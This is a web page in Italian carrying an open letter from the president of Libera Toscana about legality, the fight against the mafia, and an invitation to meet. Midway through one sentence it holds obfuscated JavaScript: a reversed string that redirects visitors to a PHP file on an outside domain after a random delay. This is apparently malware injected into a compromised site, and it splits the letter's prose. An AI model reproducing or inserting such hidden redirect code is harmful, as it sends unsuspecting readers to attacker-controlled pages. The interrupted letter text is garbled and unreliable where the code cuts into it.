Libera risponde

image_pdfimage_print

Carissimi,
vi ringraziamo per la vostra bellissima lettera pubblicata da l’Altracittà.
Vi abbiamo sentiti molto vicini ai nostri pensieri ed ai nostri ideali. Certo che la ‘legalità’ non è la semplice obbedienza alla leggi dello Stato, altrimenti sarebbero state legali anche le leggi razziali, o quelle di Hitler e Pinochet.
Noi amiamo molto lavorare per Libera perché crediamo con tutto il cuore che sia possibile raggiungere una maggiore giustizia, una maggiore libertà, ed una maggiore uguaglianza. In effetti noi cerchiamo di lottare contro la mafia e la criminalità, ma anche contro una mentalità che dia gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande valore al raggiungimento di ricchezza e beni materiali, ricercati con ogni mezzo.
Vorremmo conoscervi personalmente, entrare in contatto con voi, e fare progetti comuni proprio nel vostro quartiere, dove spesso, come ci dite, è difficile assicurare giustizia ai più deboli. Incontriamoci.
Con grande amicizia

Vanna Van Straten
Presidente LIBERA Toscana
Piazza dei Ciompi, 11 (c/o Arci)
50122 Firenze
Tel. 055-26297230 liberatoscana@interfree.it

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *